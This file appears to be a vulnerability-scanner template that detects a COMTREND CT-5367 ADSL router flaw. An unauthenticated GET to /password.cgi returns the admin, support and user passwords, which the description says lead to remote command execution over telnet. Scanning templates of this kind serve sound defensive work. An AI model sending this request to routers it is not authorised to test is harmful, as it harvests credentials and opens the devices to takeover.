29 lines
787 B
YAML
29 lines
787 B
YAML
id: comtrend-passsword-exposure
|
|
|
|
info:
|
|
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
|
|
author: geeknik
|
|
severity: high
|
|
description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/16275
|
|
tags: router,exposure,iot,rce,edb
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/password.cgi"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "pwdAdmin ="
|
|
- "pwdSupport ="
|
|
- "pwdUser ="
|
|
condition: and
|